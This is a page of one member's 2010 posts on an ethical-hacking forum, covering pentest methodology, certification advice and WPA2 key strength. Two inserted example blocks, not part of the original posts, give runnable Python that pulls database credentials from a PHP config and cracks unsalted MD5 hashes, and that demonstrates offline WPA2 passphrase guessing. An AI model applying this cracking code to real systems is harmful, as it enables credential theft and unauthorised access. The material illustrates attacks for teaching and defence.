EH-Net
  Show Posts
Pages: 1 ... 63 64 [65] 66 67 ... 71
961  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pentesting tools on: May 21, 2010, 11:17:01 AM
I'm with sil and ketchup; I think exploitation is a crucial aspect of penetration testing. As mentioned earlier, it seems like there is some confusion when it comes to terminology. Identifying and reporting vulnerabilities is much better classified as a vulnerability assessment. It doesn't make sense to label something a penetration test if there are no attempts to penetrate. While there are other ways to compromise a system (e.g. password guessing), exploitation is one of the most effective methods (if not the most effective).

I think some of you are over-hyping exploitation and "automated" tools. While it's always possible that someone may have a severely out-of-date domain controller or a password of "Password1", I've found that it's very rare to own a network with just a few clicks.

Here's a personal example of how exploitation provided much more meaningful results for a test of mine: I found a Linux server that was running exclusively as a web server. It only had the default Apache page accessible, but a reverse DNS lookup returned a meaningful name, so it was clearly being used for something. I was curious, so I busted out DirBuster. A few seconds later I was playing around with some obscure open-source helpdesk/ticketing system. I researched it a bit, and lo and behold, there was a publicly available exploit for it.

It provided a shell on the system. The system was locked down for the most part, but I was able to get a MySQL username and password from settings.php. From there, I queried the helpdesk database's users table. The administrator's password hash was cracked in a few seconds, and it got me into a few other systems.

Unfortunately, this all transpired shortly before the end of the engagement, and I wasn't able to completely compromise their network. However, you can see how this provided much more meaningful results than saying, "Your helpdesk web app is vulnerable." No one would have cared about that at all.
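Added example, not part of the post above and not code from the helpdesk product it describes: the post-exploitation chain in Python, from pulling the MySQL credentials out of a settings.php to a wordlist attack on an unsalted MD5 hash from the application's users table. The config contents, usernames, hashes and wordlist are all constructed here; the real app's file layout and hash format are not stated in the post and are assumed. Runs stand-alone on Python 3 with the standard library.

```python
"""Added example (not from the original post or the helpdesk app it mentions).

Step 1: extract $db_* credentials from a PHP config file without evaluating PHP.
Step 2: run a wordlist attack on unsalted MD5 password hashes pulled from the
        application's users table (the hash format is an assumption).
"""
import hashlib
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed stand-in for the helpdesk app's settings.php (hypothetical layout).
SETTINGS_PHP = """<?php
$db_host = 'localhost';
$db_user = "helpdesk";
$db_pass = 'Summer2010';
$db_name = 'helpdesk';
"""

# Constructed rows, as `SELECT username, password FROM users` might return them.
# Unsalted MD5 is assumed; it was common in older PHP apps.
USERS_TABLE: List[Tuple[str, str]] = [
    ("admin", hashlib.md5(b"Password1").hexdigest()),              # weak, falls instantly
    ("jsmith", hashlib.md5(b"Dinner?Pizza&17Beers!").hexdigest()),  # not in the wordlist
]

# Constructed wordlist; a real run would use rockyou.txt or similar.
WORDLIST = ["123456", "password", "Password1", "letmein", "helpdesk", "Summer2010"]


def extract_db_credentials(php_source: str) -> Dict[str, str]:
    """Pull `$db_xxx = '...';` / `$db_xxx = "...";` assignments out of PHP source.

    A regex is enough for plain literals; this deliberately does not interpret
    PHP (no concatenation, no interpolated variables), so anything dynamic is
    left for manual review.
    """
    pattern = re.compile(r'''\$(db_\w+)\s*=\s*(['"])(.*?)\2\s*;''')
    return {name: value for name, _quote, value in pattern.findall(php_source)}


def crack_md5(target_hex: str, wordlist: Iterable[str]) -> Optional[str]:
    """Unsalted MD5 wordlist attack: one digest per guess, no per-user salt.

    Because there is no salt, a hit for one user also cracks every other user
    with the same password, and precomputed tables work against the whole dump.
    """
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex.lower():
            return candidate
    return None


def crack_users(rows: Iterable[Tuple[str, str]], wordlist: List[str]) -> Dict[str, str]:
    """Return {username: cleartext} for every row the wordlist recovers."""
    found: Dict[str, str] = {}
    for username, hash_hex in rows:
        password = crack_md5(hash_hex, wordlist)
        if password is not None:
            found[username] = password
    return found


if __name__ == "__main__":
    creds = extract_db_credentials(SETTINGS_PHP)
    print("DB credentials:", creds["db_user"], "/", creds["db_pass"])
    print("Cracked accounts:", crack_users(USERS_TABLE, WORDLIST))
```

The DB password recovered in step 1 goes straight into the wordlist for step 2, since admins reuse credentials between the database and the application more often than not; that is the same reuse point made further down this page about forum and bank passwords.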
962  Ethical Hacking Discussions and Related Certifications / Compliance, Regulations & Standards / Re: Policy for personal laptops at work on: May 20, 2010, 04:34:01 PM
You should ideally get management to formally disallow that in your information security policies. If you have a problem with users disobeying policies, you could look at NAC, 802.1x, etc.

VPN access is best used only on corporate laptops that you have control over. You're right that there's not much difference between bringing in random machines and allowing random machines to establish VPN connections. This can obviously vary quite a bit, though, based on how you're implementing VLANs, DMZs, ACLs, etc.
963  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Security+ Before CEH on: May 20, 2010, 04:29:02 PM
I plan on taking the Sec+ and the Net+ this year. I really only care about the Sec+, but if I can I am going to take both because of the change that happens in 2011 where you have to re-up every 3 years. I just want these under my belt so I show I am at least knowledgeable in basic net and sec ideology.

Yea, I keep forgetting about that since I've had my CompTIA certs for a while. That's an excellent point to consider for anyone considering the A+, Net+, and/or Sec+ in 2010.
964  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Security+ Before CEH on: May 20, 2010, 09:36:07 AM
I think you're really going to make things harder on yourself in the long run if you don't master the fundamentals first. To be completely candid, I don't think a "basic understanding" is sufficient.

At the same time, that doesn't mean you have to work on something like the Network+ exclusively. Pace yourself and keep tinkering around with whatever else you find interesting.

As mentioned, the CompTIA exams are pretty basic. If you're not at that level, you're really going to struggle with the CEH.

Let me be clear, you don't need those certifications, you need the knowledge. I've never taken the Network+, and I never will. I just want to stress the importance of mastering the fundamentals. No one wants to be a script kiddie ;)
965  Ethical Hacking Discussions and Related Certifications / OSCP - Offensive Security Certified Professional / Re: OSCP before or after CEH on: May 20, 2010, 08:32:04 AM
Yea, OffSec only lets you schedule a couple of weeks out. They add a date every week ;)

I'm also with the consensus that you should do the CEH first. That's definitely a foundation you want for the OSCP.
966  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Security+ Before CEH on: May 20, 2010, 08:24:12 AM
I really don't understand the logic; I think you should stick with your first plan.

If you're going to do those other certifications, why not build a solid foundation and work your way up? The CEH material, especially the self-study books, certainly does not cover everything that is on the exam (or that you should know to be at that level).

You obviously don't need to take the exams, but if you want them, and you're working through the material anyway, I don't see any value in postponing them (unless it's a financial issue).
967  Ethical Hacking Discussions and Related Certifications / General Certification / Re: Finally taking Security+ April 20th *Update PASSED* on: May 19, 2010, 12:33:44 PM
Congrats dude!
968  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pentesting the computer of a friend on: May 11, 2010, 03:32:48 PM
Is Hayabusa the only one warned or blocked by their ISP?

I was going to warn you against this as well. Some ISPs prohibit this completely while others will sell you a premium service where those types of activities are acceptable. I'd definitely check with your ISP before doing anything.
969  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Pentesting Server on: May 11, 2010, 03:25:56 PM
You need to understand people are trying to protect you as well. You really should have a signed, written contract. You may find that the person who gave you permission to do this doesn't actually have the authority to do so. Or he passes the blame on to you if something goes wrong. You're also subject to the laws of countries you're in, the target's in, and any country the packets pass through (they may not go in a straight line). You could quickly find yourself in serious trouble and ruin your career. It's a point that's worth bringing up, even if you only want technical information.

P.S. Run DirBuster against the web server. Maybe you'll find some interesting web apps.
970  Ethical Hacking Discussions and Related Certifications / OS / Re: RHCT study guide? on: May 09, 2010, 09:12:02 PM
The Jang RHCE book will be another great reference for you: http://www.amazon.com/Certified-Engineer-Linux-Study-Certification/dp/0072264543/ref=sr_1_1?ie=UTF8&s=books&qid=1273457465&sr=8-1
971  Ethical Hacking Discussions and Related Certifications / General Certification / Re: I passed the GCIH exam! on: April 30, 2010, 10:16:33 AM
Congratulations!

Do you have any recommendations for anyone looking to self-study this material?
972  Resources / Tools / Re: Metasploit Express on: April 28, 2010, 01:44:34 PM
My concern is that the majority of the development/bugfix/etc time will be spent on improving and fixing issues in the express version of metasploit, instead of on the framework itself.  That's not to say that the framework won't be improved, but the improvements will be driven by a desire to improve the express version, instead of improving the framework for its own sake.  This may lead to a lot of development work on features we'll never see.

Isn't Express going to run on the Framework? I don't think they're going to be independent products. It seems like Express is adding a GUI, automation, reporting, etc.
973  Ethical Hacking Discussions and Related Certifications / Wireless / Re: Is WPA-PSK2 a decent connection or should I get something stronger? on: April 26, 2010, 10:00:07 PM
Using a key like what I posted is going to give you a very secure connection. One of the main advantages of moving to Enterprise from PSK is key distribution, which isn't a big concern when you only have a small number of users.

You'll want to check out this book: http://www.wiresharkbook.com/

The capture and/or display filters will help you work with the data much more easily. It's overwhelming if you just look at everything simultaneously.

I like KeePass a lot. I think 32 random characters is overkill for most sites. Password length and complexity should be proportionate to the sensitivity of data/level of access. Random forums probably don't need passwords as strong as the ones for your bank accounts. It's also important to reuse passwords as little as possible. If a forum gets compromised, you don't want that to be the same info for critical accounts.

You might want to consider passphrases as well. They're much easier to remember, yet they are still complex from a guessing perspective.

For example: Dinner?Pizza&17Beers!
974  Ethical Hacking Discussions and Related Certifications / Wireless / Re: Is WPA-PSK2 a decent connection or should I get something stronger? on: April 26, 2010, 04:42:05 PM
It's going to be as strong as the key you choose to use. It's not going to be secure if you use 'a' as your key. I get something from here and copy-paste into my devices: https://www.grc.com/passwords.htm

I VPN back somewhere if I'm using the connection for something I wouldn't want people to eavesdrop on. If you're just using it to check the news, watch YouTube, etc. it may not be necessary. Be wary of what cookies are transmitted or any other service that'll be logging on in the background though.

Packet sniffing is always a good thing to do (assuming you have permission and are doing so ethically). It's good to get used to seeing how things work.
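Added example for the two WPA2-PSK posts above (not code from the thread): why the network is exactly as strong as the key. WPA2 derives the 256-bit PMK as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations), so anyone who captures the 4-way handshake can test passphrase guesses offline at that fixed cost per guess. The SSID, passphrases and wordlist are constructed. The example stops at the PMK: a real cracker also derives the PTK from it and checks the EAPOL MIC, which adds a few cheap HMACs per guess and does not change the economics. Note that a one-character key like 'a' would be rejected by any standard supplicant, since the spec requires 8 to 63 ASCII characters; the attack below starts at that minimum.

```python
"""Added example (not from the original thread): WPA2-PSK offline guessing cost.

PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32 bytes), per IEEE 802.11i.
Everything below the PMK (PTK derivation, EAPOL MIC check) is omitted; see lead-in.
"""
import hashlib
import math
import time
from typing import Iterable, Optional

SSID = "homenet"                                   # constructed network name
WEAK_PSK = "12345678"                              # the kind of key that falls in seconds
# Constructed 63-char key of the kind https://www.grc.com/passwords.htm hands out.
STRONG_PSK = "rX9!mK2$wL7&bQ4*nZ8@fJ3^hT6%dV1+gC5=yB0~pM8?sN4{kW2}eA7[uH3]oI9"
WORDLIST = ["a", "password", "12345678", "homenet2010", "letmein"]  # constructed


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Passphrase-to-PMK mapping from 802.11i: PBKDF2-HMAC-SHA1, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def offline_dictionary_attack(target_pmk: bytes, ssid: str,
                              wordlist: Iterable[str]) -> Optional[str]:
    """Derive the PMK for each candidate and compare. Returns the passphrase or None.

    target_pmk stands in for the captured handshake: in practice the attacker
    cannot see the PMK, but the handshake lets them verify each guess, which
    costs the same 4096 PBKDF2 rounds shown here.
    """
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:
            continue  # not a legal WPA passphrase, no point deriving it
        if wpa2_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None


def keyspace_bits(length: int, alphabet_size: int) -> float:
    """Entropy of a uniformly random key: length * log2(alphabet size)."""
    return length * math.log2(alphabet_size)


def years_to_exhaust(bits: float, guesses_per_second: float) -> float:
    """Wall-clock years to try the whole keyspace at a given guess rate."""
    return 2.0 ** bits / guesses_per_second / (365 * 24 * 3600)


def measure_guess_rate(ssid: str, samples: int = 50) -> float:
    """Rough single-core PBKDF2 rate on this machine, in guesses per second."""
    start = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f"candidate{i:04d}", ssid)
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    print("weak key recovered:  ", offline_dictionary_attack(wpa2_pmk(WEAK_PSK, SSID), SSID, WORDLIST))
    print("strong key recovered:", offline_dictionary_attack(wpa2_pmk(STRONG_PSK, SSID), SSID, WORDLIST))
    rate = measure_guess_rate(SSID)
    print(f"about {rate:.0f} guesses/s on one core here")
    for label, bits in [("8 lowercase letters", keyspace_bits(8, 26)),
                        ("63 printable ASCII", keyspace_bits(63, 94))]:
        # Assume an attacker with a million times this machine's throughput (GPU rigs, rented compute).
        print(f"{label}: {bits:.0f} bits, {years_to_exhaust(bits, rate * 1_000_000):.3g} years")
```

The SSID is the salt, so a common SSID ("linksys", "NETGEAR") lets an attacker reuse precomputed PMK tables across every network with that name; an unusual SSID forces the 4096 rounds per guess per network. The passphrase is still what decides the outcome: the 8-digit key above is found by a short list, while the 63-character random key has more bits than the attacker can ever enumerate.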
975  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: GWAPT certification study material required on: April 24, 2010, 11:50:45 AM
http://www.owasp.org/index.php/OWASP_Testing_Project and http://www.amazon.com/Web-Application-Hackers-Handbook-Discovering/dp/0470170778/ref=sr_1_2?ie=UTF8&s=books&qid=1272127661&sr=8-2 should get you in pretty good shape. I haven't taken this myself, so I'm not sure if that'll cover everything.

However, you get two practice exams if you challenge the exam, and those should provide additional insight into what else (if anything) you need to work on.

You'll obviously need to understand HTML, Javascript, etc. as well.
© 2013 The Ethical Hacker Network